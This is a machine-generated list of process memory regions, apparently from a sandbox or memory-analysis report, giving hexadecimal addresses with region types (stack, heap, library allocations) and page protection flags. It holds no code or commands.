3CCF000
stack
page read and write
4270000
heap
page execute and read and write
980000
heap
page read and write
8C9D000
stack
page read and write
76E0000
trusted library allocation
page read and write
7BEC000
stack
page read and write
73EE000
stack
page read and write
5817000
trusted library allocation
page read and write
E27000
heap
page read and write
561A000
trusted library allocation
page read and write
79C0000
heap
page execute and read and write
4C4F000
trusted library allocation
page read and write
58C0000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
7845000
heap
page read and write
34DE000
stack
page read and write
2AB3000
direct allocation
page execute and read and write
7ED0000
trusted library allocation
page read and write
4EDE000
stack
page read and write
808E000
stack
page read and write
8793000
trusted library allocation
page read and write
FBB000
stack
page read and write
7DE0000
trusted library allocation
page read and write
3730000
trusted library allocation
page read and write
4E43000
trusted library allocation
page execute and read and write
32B3000
trusted library allocation
page execute and read and write
5A1E000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
8496000
heap
page read and write
4C9000
unkown
page execute and read and write
467000
unkown
page execute and read and write
680D000
stack
page read and write
7C23000
trusted library allocation
page read and write
7C7D000
stack
page read and write
78C0000
heap
page read and write
3C9F000
stack
page read and write
4F50000
trusted library allocation
page read and write
81A7000
heap
page read and write
4D6D000
trusted library allocation
page execute and read and write
4D8A000
trusted library allocation
page execute and read and write
2A10000
heap
page read and write
36DE000
stack
page read and write
4C68000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
696E000
stack
page read and write
7BBF000
heap
page read and write
8820000
heap
page read and write
ECB000
stack
page read and write
2EF0000
heap
page read and write
5A1000
unkown
page execute and read and write
67EC000
stack
page read and write
4CCE000
stack
page read and write
74B0000
trusted library allocation
page read and write
165F000
stack
page read and write
8828000
heap
page read and write
4F0C000
stack
page read and write
2F90000
heap
page read and write
4B0E000
stack
page read and write
30C0000
heap
page read and write
752E000
stack
page read and write
830E000
stack
page read and write
83EC000
heap
page read and write
3720000
trusted library allocation
page read and write
6AD0000
heap
page read and write
7ECE000
stack
page read and write
741E000
stack
page read and write
72CC000
trusted library allocation
page read and write
768D000
stack
page read and write
7320000
trusted library allocation
page read and write
2B56000
heap
page read and write
2E90000
heap
page read and write
30B0000
heap
page read and write
4F40000
trusted library allocation
page read and write
6BEE000
stack
page read and write
49AE000
stack
page read and write
491E000
stack
page read and write
431E000
stack
page read and write
315E000
stack
page read and write
355000
unkown
page execute and read and write
5C2000
unkown
page execute and read and write
720A000
stack
page read and write
32D0000
trusted library allocation
page read and write
434E000
stack
page read and write
3220000
trusted library allocation
page read and write
D5E000
stack
page read and write
511D000
trusted library allocation
page read and write
7A8E000
stack
page read and write
89BE000
stack
page read and write
73CAD000
unkown
page read and write
48E0000
trusted library allocation
page read and write
970000
heap
page read and write
7CC0000
trusted library allocation
page read and write
492D000
trusted library allocation
page read and write
3460000
heap
page read and write
5D29000
trusted library allocation
page read and write
5EAE000
trusted library allocation
page read and write
5EF000
unkown
page execute and read and write
531000
unkown
page execute and read and write
8FEE000
heap
page read and write
1485000
heap
page read and write
5230000
trusted library allocation
page read and write
4913000
trusted library allocation
page execute and read and write
7520000
heap
page execute and read and write
67B000
unkown
page execute and read and write
8010000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
2FA0000
heap
page read and write
7C00000
trusted library allocation
page read and write
2F3D000
stack
page read and write
73FD000
stack
page read and write
82C0000
heap
page read and write
54B5000
trusted library allocation
page read and write
76AE000
stack
page read and write
73CAF000
unkown
page readonly
549000
unkown
page execute and read and write
4E59000
stack
page read and write
45B7000
trusted library allocation
page execute and read and write
75E000
stack
page read and write
73CAD000
unkown
page read and write
41EC000
stack
page read and write
57B1000
trusted library allocation
page read and write
848A000
heap
page read and write
7F790000
trusted library allocation
page execute and read and write
6D81000
heap
page read and write
7770000
trusted library allocation
page execute and read and write
3B8E000
stack
page read and write
3400000
heap
page read and write
AA2000
unkown
page execute and write copy
6FA0000
heap
page execute and read and write
40F0000
direct allocation
page read and write
2FBE000
stack
page read and write
74F0000
trusted library allocation
page read and write
4240000
trusted library allocation
page execute and read and write
33D0000
heap
page read and write
2AE0000
heap
page read and write
7640000
trusted library allocation
page read and write
13A0000
heap
page read and write
819D000
stack
page read and write
2AD4000
heap
page read and write
2C40000
heap
page read and write
35AF000
stack
page read and write
4BFC000
stack
page read and write
3FEE000
stack
page read and write
73C91000
unkown
page execute read
4D0E000
stack
page read and write
3010000
heap
page read and write
6DC9000
heap
page read and write
3724000
trusted library allocation
page read and write
35E0000
trusted library allocation
page read and write
3CDE000
stack
page read and write
7F0E8000
trusted library allocation
page execute and read and write
E32000
heap
page read and write
9CAE000
stack
page read and write
834E000
stack
page read and write
6C0E000
stack
page read and write
4AC5000
trusted library allocation
page read and write
1430000
heap
page read and write
523E000
trusted library allocation
page read and write
835C000
heap
page read and write
4DE0000
heap
page read and write
70D000
unkown
page execute and read and write
77EE000
stack
page read and write
2DA9000
trusted library allocation
page read and write
78B5000
heap
page read and write
8D8B000
stack
page read and write
8990000
trusted library allocation
page read and write
1E8000
unkown
page execute and write copy
8220000
heap
page read and write
5146000
trusted library allocation
page read and write
5566000
trusted library allocation
page read and write
4198000
trusted library allocation
page read and write
6AD000
stack
page read and write
506E000
stack
page read and write
5A9000
unkown
page execute and read and write
36CE000
stack
page read and write
8260000
trusted library allocation
page read and write
747E000
stack
page read and write
4D00000
trusted library allocation
page read and write
1311000
heap
page read and write
7DCB000
heap
page read and write
57D9000
trusted library allocation
page read and write
594A000
trusted library allocation
page read and write
4F6B000
trusted library allocation
page execute and read and write
2B56000
heap
page read and write
73C9000
heap
page read and write
9036000
heap
page read and write
78F000
stack
page read and write
4E4E000
stack
page read and write
8790000
trusted library allocation
page read and write
4AC0000
trusted library allocation
page read and write
302E000
stack
page read and write
7290000
trusted library allocation
page read and write
15BE000
stack
page read and write
AA8000
unkown
page execute and read and write
8FA9000
heap
page read and write
873A000
trusted library allocation
page read and write
4D3000
heap
page read and write
2A10000
remote allocation
page read and write
4930000
trusted library allocation
page read and write
4D90000
trusted library allocation
page read and write
6CCE000
stack
page read and write
4A60000
direct allocation
page read and write
8E8D000
stack
page read and write
7551000
heap
page read and write
73CAD000
unkown
page read and write
8630000
trusted library allocation
page read and write
88FE000
stack
page read and write
2AF6000
heap
page read and write
6D79000
heap
page read and write
31E0000
heap
page read and write
2B50000
heap
page read and write
900D000
heap
page read and write
78AD000
heap
page read and write
A05E000
stack
page read and write
42FE000
stack
page read and write
2900000
heap
page read and write
5687000
trusted library allocation
page read and write
2FF9000
heap
page read and write
7840000
trusted library allocation
page read and write
8838000
heap
page read and write
7CB0000
trusted library allocation
page read and write
43C1000
trusted library allocation
page read and write
FC8000
stack
page read and write
7690000
trusted library allocation
page read and write
8780000
trusted library allocation
page read and write
409E000
stack
page read and write
3310000
heap
page readonly
514B000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
1575000
heap
page read and write
3070000
heap
page read and write
D40000
unkown
page execute and read and write
6D70000
heap
page read and write
772E000
stack
page read and write
4F60000
heap
page execute and read and write
45BB000
trusted library allocation
page execute and read and write
45CE000
stack
page read and write
9007000
heap
page read and write
5659000
trusted library allocation
page read and write
4FAA000
heap
page read and write
8650000
trusted library allocation
page read and write
55DB000
trusted library allocation
page read and write
3A4E000
stack
page read and write
980E000
stack
page read and write
2DB0000
heap
page read and write
83F4000
heap
page read and write
760D000
stack
page read and write
32EE000
stack
page read and write
81DE000
stack
page read and write
44AE000
stack
page read and write
4D80000
trusted library allocation
page read and write
779E000
stack
page read and write
7E40000
trusted library allocation
page read and write
7F5D8000
trusted library allocation
page execute and read and write
30E3000
heap
page read and write
3120000
direct allocation
page execute and read and write
4CEE000
stack
page read and write
55FB000
trusted library allocation
page read and write
476000
unkown
page execute and write copy
726000
unkown
page execute and write copy
7ACE000
stack
page read and write
12E0000
heap
page read and write
7FCE000
stack
page read and write
5667000
trusted library allocation
page read and write
7F80000
trusted library allocation
page read and write
56D000
stack
page read and write
450000
unkown
page readonly
2FE5000
trusted library allocation
page execute and read and write
5427000
trusted library allocation
page read and write
3190000
heap
page read and write
78C2000
heap
page read and write
893E000
stack
page read and write
A7A0000
trusted library allocation
page execute and read and write
4D90000
heap
page read and write
8C10000
trusted library allocation
page read and write
2DBF000
stack
page read and write
336E000
stack
page read and write
D00000
heap
page read and write
37DF000
stack
page read and write
3105000
heap
page read and write
7110000
trusted library allocation
page read and write
4E77000
trusted library allocation
page execute and read and write
155E000
heap
page read and write
76CB000
stack
page read and write
405E000
stack
page read and write
2D93000
trusted library allocation
page execute and read and write
2B56000
heap
page read and write
3260000
heap
page read and write
7DD0000
trusted library allocation
page read and write
595A000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
4C60000
trusted library allocation
page read and write
4E44000
trusted library allocation
page read and write
47DF000
trusted library allocation
page read and write
45D0000
trusted library allocation
page read and write
31A5000
heap
page read and write
73EE000
stack
page read and write
3110000
direct allocation
page execute and read and write
7BEE000
trusted library allocation
page read and write
3380000
heap
page read and write
157E000
stack
page read and write
441F000
stack
page read and write
6ECD000
stack
page read and write
2AF0000
heap
page read and write
8C30000
trusted library allocation
page read and write
7BAD000
stack
page read and write
30C0000
heap
page read and write
2B5E000
stack
page read and write
45B0000
trusted library allocation
page read and write
2B15000
heap
page read and write
6DF8000
heap
page read and write
2B6F000
heap
page read and write
5418000
trusted library allocation
page read and write
30EA000
heap
page read and write
7AD000
stack
page read and write
88A4000
heap
page read and write
8AB000
stack
page read and write
7B80000
trusted library allocation
page execute and read and write
8663000
trusted library allocation
page read and write
A2DE000
stack
page read and write
32AF000
stack
page read and write
431E000
stack
page read and write
2F80000
trusted library section
page read and write
2CB0000
heap
page read and write
73CA6000
unkown
page readonly
8388000
heap
page read and write
8F73000
heap
page read and write
8800000
trusted library allocation
page execute and read and write
50EE000
stack
page read and write
6F0B000
stack
page read and write
72F7000
trusted library allocation
page read and write
6170000
trusted library allocation
page read and write
E9A000
heap
page read and write
83CE000
stack
page read and write
2D90000
trusted library allocation
page read and write
2B50000
heap
page read and write
408E000
stack
page read and write
885B000
trusted library allocation
page read and write
8322000
heap
page read and write
72DE000
stack
page read and write
63F000
unkown
page execute and read and write
49B1000
trusted library allocation
page read and write
479E000
stack
page read and write
8930000
trusted library allocation
page read and write
3140000
heap
page read and write
30EC000
heap
page read and write
2AD0000
direct allocation
page execute and read and write
E97000
heap
page read and write
3200000
trusted library section
page read and write
3380000
heap
page read and write
7ADD000
stack
page read and write
84F0000
trusted library allocation
page read and write
E1A000
heap
page read and write
2DFA000
heap
page read and write
30A0000
heap
page read and write
4FE2000
trusted library allocation
page read and write
4662000
trusted library allocation
page read and write
2AD9000
heap
page read and write
2940000
heap
page read and write
9C6E000
stack
page read and write
420E000
stack
page read and write
7851000
heap
page read and write
50EE000
stack
page read and write
4DA000
heap
page read and write
4C49000
trusted library allocation
page read and write
746E000
stack
page read and write
702E000
stack
page read and write
4FA0000
heap
page read and write
3F5E000
stack
page read and write
5A20000
trusted library allocation
page read and write
4F40000
heap
page read and write
7EC5000
trusted library allocation
page read and write
75B0000
heap
page read and write
7CE000
stack
page read and write
4C9E000
stack
page read and write
4E75000
trusted library allocation
page execute and read and write
7830000
heap
page read and write
460000
heap
page read and write
1C2000
unkown
page execute and write copy
2FDE000
unkown
page read and write
2FC0000
trusted library allocation
page read and write
436E000
stack
page read and write
7C20000
trusted library allocation
page read and write
DD0000
heap
page read and write
349000
unkown
page execute and read and write
73CAD000
unkown
page read and write
7E0D000
heap
page read and write
70A000
unkown
page execute and read and write
776D000
stack
page read and write
334D000
stack
page read and write
498000
stack
page read and write
4D70000
trusted library allocation
page read and write
423C000
stack
page read and write
358E000
stack
page read and write
725F000
stack
page read and write
2E6E000
heap
page read and write
2F3E000
stack
page read and write
9020000
heap
page read and write
2D60000
trusted library section
page read and write
4E50000
trusted library allocation
page read and write
86CE000
stack
page read and write
7CEE000
stack
page read and write
7E30000
trusted library allocation
page read and write
1320000
heap
page read and write
A551000
heap
page read and write
4F5A000
trusted library allocation
page execute and read and write
31E0000
heap
page read and write
81BE000
heap
page read and write
2FE2000
trusted library allocation
page read and write
341E000
stack
page read and write
2C10000
heap
page read and write
6D35000
heap
page execute and read and write
903E000
stack
page read and write
56BC000
trusted library allocation
page read and write
7190000
trusted library allocation
page read and write
819E000
heap
page read and write
73F6000
heap
page read and write
2925000
trusted library allocation
page execute and read and write
5665000
trusted library allocation
page read and write
4CF0000
heap
page read and write
28F3000
trusted library allocation
page execute and read and write
4FEE000
stack
page read and write
7F0000
heap
page read and write
7DC0000
trusted library allocation
page read and write
7647000
trusted library allocation
page read and write
6D6A000
heap
page read and write
8640000
trusted library allocation
page execute and read and write
28FE000
stack
page read and write
3300000
trusted library allocation
page read and write
A630000
trusted library allocation
page read and write
3388000
heap
page read and write
7581000
heap
page read and write
4DD8000
trusted library allocation
page read and write
3370000
trusted library allocation
page execute and read and write
4E0E000
stack
page read and write
4FC000
unkown
page execute and write copy
30C7000
heap
page read and write
8D90000
heap
page read and write
7FB60000
trusted library allocation
page execute and read and write
71F000
unkown
page execute and read and write
892D000
stack
page read and write
7E5E000
stack
page read and write
2909000
trusted library allocation
page read and write
8171000
heap
page read and write
81F0000
trusted library allocation
page execute and read and write
D90000
heap
page read and write
3200000
heap
page read and write
30EA000
heap
page read and write
7187000
trusted library allocation
page read and write
5264000
trusted library allocation
page read and write
2EE5000
heap
page read and write
5FA9000
trusted library allocation
page read and write
6B0E000
heap
page read and write
5149000
trusted library allocation
page read and write
8F7B000
stack
page read and write
7876000
heap
page read and write
88BD000
stack
page read and write
28F4000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
BEE000
unkown
page execute and read and write
4CF000
heap
page read and write
7DB0000
trusted library allocation
page read and write
4E40000
trusted library allocation
page read and write
47DE000
stack
page read and write
7BC9000
heap
page read and write
8790000
trusted library allocation
page read and write
7CAE000
stack
page read and write
2B9E000
stack
page read and write
3D6E000
stack
page read and write
6E40000
trusted library allocation
page read and write
4F30000
heap
page execute and read and write
78A0000
heap
page read and write
6F5000
unkown
page execute and read and write
7E1D000
stack
page read and write
4F5000
heap
page read and write
8A3E000
stack
page read and write
5AD000
stack
page read and write
2AD0000
heap
page read and write
7390000
heap
page read and write
178E000
stack
page read and write
1639000
heap
page read and write
4C5F000
stack
page read and write
600000
unkown
page execute and read and write
5242000
trusted library allocation
page read and write
5FB4000
trusted library allocation
page read and write
2CB9000
heap
page read and write
756B000
stack
page read and write
419E000
stack
page read and write
8394000
heap
page read and write
3F1F000
stack
page read and write
31C0000
direct allocation
page execute and read and write
8BCE000
stack
page read and write
4EDE000
stack
page read and write
2EE0000
direct allocation
page execute and read and write
4F2A000
trusted library allocation
page execute and read and write
4A8E000
stack
page read and write
6D30000
heap
page execute and read and write
733E000
stack
page read and write
8FDA000
heap
page read and write
7F7A8000
trusted library allocation
page execute and read and write
55BC000
trusted library allocation
page read and write
4728000
trusted library allocation
page read and write
625000
unkown
page execute and read and write
8005000
trusted library allocation
page read and write
4423000
trusted library allocation
page read and write
4D79000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
A574000
heap
page read and write
71DC000
stack
page read and write
883B000
stack
page read and write
7B38000
heap
page read and write
7F5C0000
trusted library allocation
page execute and read and write
58E4000
trusted library allocation
page read and write
6D7D000
stack
page read and write
5E0000
unkown
page execute and read and write
133E000
stack
page read and write
7898000
heap
page read and write
42BE000
stack
page read and write
31C000
unkown
page execute and read and write
57D1000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
2C8F000
stack
page read and write
4F7000
unkown
page execute and read and write
72B0000
trusted library allocation
page read and write
311E000
stack
page read and write
4C8000
heap
page read and write
3105000
heap
page read and write
30DF000
heap
page read and write
329000
unkown
page execute and read and write
8003000
trusted library allocation
page read and write
8207000
trusted library allocation
page read and write
616000
unkown
page execute and read and write
484E000
stack
page read and write
AA8000
unkown
page execute and write copy
14BE000
stack
page read and write
6F0E000
stack
page read and write
7B00000
heap
page read and write
476000
unkown
page execute and read and write
4BCE000
stack
page read and write
2ADC000
heap
page read and write
5552000
trusted library allocation
page read and write
6184000
trusted library allocation
page read and write
180E000
stack
page read and write
3080000
heap
page read and write
68D000
stack
page read and write
2AFA000
heap
page read and write
5FA1000
trusted library allocation
page read and write
3AEE000
stack
page read and write
8DA1000
heap
page read and write
50A6000
trusted library allocation
page read and write
DC0000
heap
page read and write
A536000
heap
page read and write
784D000
heap
page read and write
2BFE000
stack
page read and write
7570000
heap
page read and write
72C3000
trusted library allocation
page read and write
33DE000
stack
page read and write
816D000
heap
page read and write
2B3C000
heap
page read and write
8FDE000
stack
page read and write
615E000
trusted library allocation
page read and write
51A6000
trusted library allocation
page read and write
787E000
stack
page read and write
3610000
heap
page read and write
2FF0000
heap
page read and write
6DD1000
heap
page read and write
8857000
heap
page read and write
56F8000
trusted library allocation
page read and write
4710000
heap
page readonly
2AF4000
heap
page read and write
7B8D000
stack
page read and write
7FAE000
stack
page read and write
6095000
trusted library allocation
page read and write
982E000
stack
page read and write
2FE0000
trusted library allocation
page read and write
4F10000
trusted library allocation
page read and write
8ECE000
stack
page read and write
7ED6000
trusted library allocation
page read and write
7D40000
heap
page read and write
4D0E000
stack
page read and write
2AEC000
direct allocation
page execute and read and write
783D000
heap
page read and write
E18000
heap
page read and write
3F4E000
stack
page read and write
72C000
unkown
page execute and read and write
BE9000
unkown
page execute and read and write
55F9000
trusted library allocation
page read and write
75D3000
heap
page read and write
394E000
stack
page read and write
7D90000
trusted library allocation
page read and write
612B000
trusted library allocation
page read and write
520000
heap
page read and write
2A98000
stack
page read and write
4E62000
trusted library allocation
page read and write
A92C000
stack
page read and write
56B4000
trusted library allocation
page read and write
73CAD000
unkown
page read and write
8A30000
heap
page read and write
64D000
stack
page read and write
419F000
stack
page read and write
6D87000
heap
page read and write
33AA000
heap
page read and write
4F4E000
stack
page read and write
75AE000
stack
page read and write
2ADA000
heap
page read and write
970000
heap
page read and write
3270000
heap
page read and write
761B000
stack
page read and write
2940000
heap
page read and write
8E1E000
stack
page read and write
74AD000
stack
page read and write
4C3000
unkown
page execute and read and write
1E6000
unkown
page execute and write copy
8C0E000
stack
page read and write
63A000
unkown
page execute and read and write
9A9000
stack
page read and write
5FC000
unkown
page execute and read and write
8110000
trusted library allocation
page read and write
4B20000
unclassified section
page read and write
7E70000
trusted library allocation
page read and write
72FE000
stack
page read and write
690D000
stack
page read and write
46B0000
trusted library allocation
page read and write
233000
unkown
page execute and read and write
8C20000
trusted library allocation
page read and write
434E000
stack
page read and write
A52000
unkown
page execute and write copy
4AD7000
trusted library allocation
page read and write
4E9E000
stack
page read and write
2EC0000
heap
page read and write
8ABF000
heap
page read and write
8200000
trusted library allocation
page read and write
4610000
heap
page execute and read and write
1480000
heap
page read and write
2780000
heap
page read and write
330F000
stack
page read and write
3DDF000
stack
page read and write
7710000
trusted library allocation
page read and write
4C0000
unkown
page readonly
4CDE000
stack
page read and write
8B02000
heap
page read and write
998F000
stack
page read and write
83E8000
heap
page read and write
D40000
heap
page read and write
76AE000
stack
page read and write
E42000
heap
page read and write
4600000
heap
page read and write
470E000
stack
page read and write
506000
heap
page read and write
3320000
heap
page read and write
75E0000
trusted library allocation
page read and write
4FB3000
trusted library allocation
page read and write
6F4E000
stack
page read and write
46C0000
heap
page read and write
7BA0000
trusted library allocation
page read and write
3180000
unclassified section
page read and write
774B000
stack
page read and write
6E31000
heap
page read and write
8610000
trusted library allocation
page read and write
83E0000
heap
page read and write
2E86000
heap
page read and write
8850000
trusted library allocation
page read and write
50AE000
stack
page read and write
73CAD000
unkown
page read and write
8737000
trusted library allocation
page read and write
38AE000
stack
page read and write
8A20000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
60F7000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
7C77000
trusted library allocation
page read and write
3090000
heap
page read and write
2FB0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
78F1000
heap
page read and write
50FA000
trusted library allocation
page read and write
4F8000
unkown
page execute and write copy
302E000
stack
page read and write
4F37000
trusted library allocation
page execute and read and write
2D80000
trusted library allocation
page read and write
2E27000
heap
page read and write
7FF0000
trusted library allocation
page read and write
6071000
trusted library allocation
page read and write
8FFC000
stack
page read and write
8DA8000
heap
page read and write
2E29000
heap
page read and write
4861000
trusted library allocation
page read and write
8F9F000
heap
page read and write
82AD000
stack
page read and write
2977000
heap
page read and write
698E000
stack
page read and write
46CE000
stack
page read and write
3AAE000
stack
page read and write
2FFF000
stack
page read and write
7FEE000
stack
page read and write
1C0000
unkown
page readonly
2D48000
heap
page read and write
53F1000
trusted library allocation
page read and write
4DB8000
trusted library allocation
page read and write
3310000
heap
page read and write
446E000
stack
page read and write
7230000
trusted library allocation
page read and write
4665000
trusted library allocation
page execute and read and write
2E3E000
stack
page read and write
4D30000
trusted library section
page read and write
AA6000
unkown
page execute and write copy
7078000
trusted library allocation
page read and write
72A0000
heap
page execute and read and write
7B7B000
heap
page read and write
50FC000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
8A2C000
heap
page read and write
4DC000
heap
page read and write
4FE000
unkown
page execute and write copy
6D0000
heap
page read and write
6C8E000
stack
page read and write
7D9B000
heap
page read and write
3D0E000
stack
page read and write
7090000
heap
page read and write
73CA6000
unkown
page readonly
6E4F000
stack
page read and write
2CE0000
heap
page read and write
46CE000
stack
page read and write
76B0000
trusted library allocation
page read and write
72C7000
trusted library allocation
page read and write
73E4000
heap
page read and write
6E3F000
stack
page read and write
4B30000
heap
page read and write
8375000
heap
page read and write
2A80000
direct allocation
page execute and read and write
1293000
heap
page read and write
7120000
trusted library allocation
page read and write
4DDF000
stack
page read and write
3329000
heap
page read and write
6F8E000
stack
page read and write
3600000
trusted library allocation
page read and write
8100000
trusted library allocation
page execute and read and write
57D1000
trusted library allocation
page read and write
4D92000
trusted library allocation
page read and write
2E4B000
heap
page read and write
73A1000
heap
page read and write
3A8E000
stack
page read and write
83CC000
stack
page read and write
7B0F000
stack
page read and write
762E000
stack
page read and write
7DC1000
heap
page read and write
765000
unkown
page execute and read and write
7800000
trusted library allocation
page read and write
4FF000
unkown
page execute and read and write
7CF0000
trusted library allocation
page execute and read and write
5A1C000
trusted library allocation
page read and write
3C2E000
stack
page read and write
2DC8000
heap
page read and write
73C90000
unkown
page readonly
4B7F000
stack
page read and write
4E1E000
stack
page read and write
6EE0000
heap
page execute and read and write
E1E000
heap
page read and write
4C08000
trusted library allocation
page read and write
6C2D000
stack
page read and write
480E000
stack
page read and write
3A1F000
stack
page read and write
8330000
heap
page read and write
78AE000
stack
page read and write
87E000
stack
page read and write
4F52000
trusted library allocation
page read and write
2D50000
trusted library section
page read and write
5953000
trusted library allocation
page read and write
E5B000
heap
page read and write
75B0000
trusted library allocation
page execute and read and write
6D2D000
stack
page read and write
5FB000
unkown
page execute and read and write
2ED0000
heap
page read and write
73CAD000
unkown
page read and write
76A0000
trusted library allocation
page read and write
4E72000
trusted library allocation
page read and write
469D000
stack
page read and write
5716000
trusted library allocation
page read and write
2AF3000
heap
page read and write
77C0000
trusted library allocation
page read and write
7100000
trusted library allocation
page read and write
597A000
trusted library allocation
page read and write
30E7000
heap
page read and write
4E1E000
stack
page read and write
2D4000
unkown
page execute and read and write
7FDF000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
441F000
stack
page read and write
297C000
stack
page read and write
7460000
heap
page execute and read and write
6D2D000
heap
page read and write
4F60000
heap
page read and write
41DE000
stack
page read and write
2FC0000
trusted library allocation
page read and write
8A20000
heap
page read and write
8FBE000
stack
page read and write
4F70000
heap
page read and write
31A0000
direct allocation
page execute and read and write
7670000
trusted library allocation
page read and write
2B2E000
stack
page read and write
2C9E000
stack
page read and write
6101000
trusted library allocation
page read and write
2970000
heap
page read and write
2D6E000
stack
page read and write
2FD0000
trusted library allocation
page read and write
32E0000
direct allocation
page execute and read and write
2B28000
heap
page read and write
4F80000
trusted library allocation
page read and write
3D0E000
stack
page read and write
4F20000
trusted library allocation
page read and write
751E000
stack
page read and write
46A0000
trusted library allocation
page read and write
305E000
stack
page read and write
2A20000
heap
page read and write
8853000
heap
page read and write
5916000
trusted library allocation
page read and write
8491000
heap
page read and write
2A9D000
stack
page read and write
7280000
heap
page read and write
12DC000
heap
page read and write
5E96000
trusted library allocation
page read and write
817D000
heap
page read and write
9940000
trusted library allocation
page read and write
2AC0000
direct allocation
page execute and read and write
6FEE000
stack
page read and write
7820000
trusted library allocation
page read and write
8790000
trusted library allocation
page read and write
84B2000
trusted library allocation
page read and write
78BE000
stack
page read and write
84D0000
trusted library allocation
page execute and read and write
3040000
heap
page read and write
2E50000
heap
page read and write
2B26000
heap
page read and write
2C30000
heap
page read and write
4AF7000
trusted library allocation
page read and write
8C50000
trusted library allocation
page execute and read and write
E66000
heap
page read and write
51A4000
trusted library allocation
page read and write
4E2E000
stack
page read and write
291A000
trusted library allocation
page execute and read and write
7700000
trusted library allocation
page read and write
7833000
heap
page read and write
301E000
stack
page read and write
2AF7000
heap
page read and write
1E2000
unkown
page execute and write copy
8740000
trusted library allocation
page read and write
8342000
heap
page read and write
7A00000
trusted library allocation
page execute and read and write
13A5000
heap
page read and write
66B000
unkown
page execute and read and write
9B6E000
stack
page read and write
28E0000
heap
page read and write
57A000
unkown
page execute and read and write
2870000
heap
page read and write
700A000
stack
page read and write
4CBC000
stack
page read and write
4E60000
trusted library allocation
page read and write
1296000
heap
page read and write
47DE000
stack
page read and write
719E000
stack
page read and write
8390000
trusted library allocation
page read and write
2DC8000
stack
page read and write
2AE8000
heap
page read and write
7130000
trusted library allocation
page read and write
6FCB000
stack
page read and write
47B000
unkown
page execute and read and write
92EE000
stack
page read and write
2AF5000
heap
page read and write
811B000
trusted library allocation
page read and write
51DF000
trusted library allocation
page read and write
319F000
stack
page read and write
754B000
stack
page read and write
542E000
trusted library allocation
page read and write
35F3000
trusted library allocation
page execute and read and write
1350000
heap
page read and write
47E8000
trusted library allocation
page read and write
721E000
stack
page read and write
2C00000
heap
page read and write
8F80000
heap
page read and write
6A50000
heap
page execute and read and write
D97000
heap
page read and write
8600000
trusted library allocation
page execute and read and write
7650000
trusted library allocation
page read and write
6ECA000
stack
page read and write
450000
heap
page read and write
51D7000
trusted library allocation
page read and write
516C000
trusted library allocation
page read and write
796000
unkown
page execute and read and write
2DC0000
heap
page read and write
2DEA000
heap
page read and write
4FA0000
heap
page execute and read and write
513A000
trusted library allocation
page read and write
2AF5000
heap
page read and write
7E94000
trusted library allocation
page read and write
6E8D000
stack
page read and write
2F90000
trusted library allocation
page read and write
6DE8000
heap
page read and write
8198000
heap
page read and write
4420000
direct allocation
page read and write
8A7F000
stack
page read and write
2CA0000
heap
page read and write
DB0000
heap
page read and write
2AFA000
heap
page read and write
8970000
trusted library allocation
page read and write
515D000
trusted library allocation
page read and write
7D50000
heap
page read and write
73CA6000
unkown
page readonly
430E000
stack
page read and write
6111000
trusted library allocation
page read and write
4F9E000
stack
page read and write
8DCE000
stack
page read and write
4C2000
unkown
page execute and write copy
9002000
heap
page read and write
2E70000
direct allocation
page execute and read and write
688E000
stack
page read and write
4ACC000
trusted library allocation
page read and write
9DAE000
stack
page read and write
2DA0000
trusted library allocation
page read and write
74EB000
stack
page read and write
12DA000
heap
page read and write
7F50000
trusted library allocation
page execute and read and write
73DE000
heap
page read and write
8317000
heap
page read and write
554A000
trusted library allocation
page read and write
3E0E000
stack
page read and write
78B1000
heap
page read and write
735B000
stack
page read and write
36AE000
stack
page read and write
750F000
stack
page read and write
8A29000
trusted library allocation
page read and write
82B8000
heap
page read and write
7F540000
trusted library allocation
page execute and read and write
485000
heap
page read and write
450000
unkown
page readonly
830E000
stack
page read and write
55DB000
trusted library allocation
page read and write
30D8000
heap
page read and write
4F56000
trusted library allocation
page execute and read and write
40EF000
stack
page read and write
306E000
stack
page read and write
480000
heap
page read and write
33B7000
heap
page read and write
326D000
stack
page read and write
54BD000
trusted library allocation
page read and write
694A000
stack
page read and write
75EB000
trusted library allocation
page read and write
4C1000
unkown
page execute and read and write
6E3E000
stack
page read and write
D40000
unkown
page execute and write copy
138E000
stack
page read and write
1435000
heap
page read and write
70AD000
stack
page read and write
4379000
stack
page read and write
6DB9000
stack
page read and write
3470000
heap
page read and write
6EBE000
stack
page read and write
328E000
stack
page read and write
75EE000
stack
page read and write
4F26000
trusted library allocation
page execute and read and write
3120000
heap
page read and write
4914000
trusted library allocation
page read and write
5100000
heap
page read and write
C10000
heap
page read and write
8EF0000
trusted library allocation
page execute and read and write
7D6D000
stack
page read and write
422E000
stack
page read and write
7180000
trusted library allocation
page read and write
3301000
direct allocation
page execute and read and write
2DC0000
heap
page read and write
89FD000
stack
page read and write
4F20000
heap
page execute and read and write
8920000
trusted library allocation
page execute and read and write
4D9000
unkown
page execute and read and write
3723000
trusted library allocation
page execute and read and write
514D000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
4D9000
heap
page read and write
48E000
unkown
page execute and read and write
5679000
trusted library allocation
page read and write
A15E000
stack
page read and write
782000
unkown
page execute and read and write
8ACC000
heap
page read and write
458E000
stack
page read and write
3020000
heap
page read and write
73CA6000
unkown
page readonly
4275000
heap
page execute and read and write
3E0E000
stack
page read and write
7790000
trusted library allocation
page read and write
901C000
heap
page read and write
7F3C8000
trusted library allocation
page execute and read and write
10DF000
stack
page read and write
28FD000
trusted library allocation
page execute and read and write
8E0E000
stack
page read and write
6CEE000
stack
page read and write
33E0000
heap
page read and write
73CAD000
unkown
page read and write
300F000
stack
page read and write
2B3C000
heap
page read and write
38DF000
stack
page read and write
4F60000
trusted library allocation
page read and write
8650000
trusted library allocation
page read and write
7400000
heap
page execute and read and write
7849000
heap
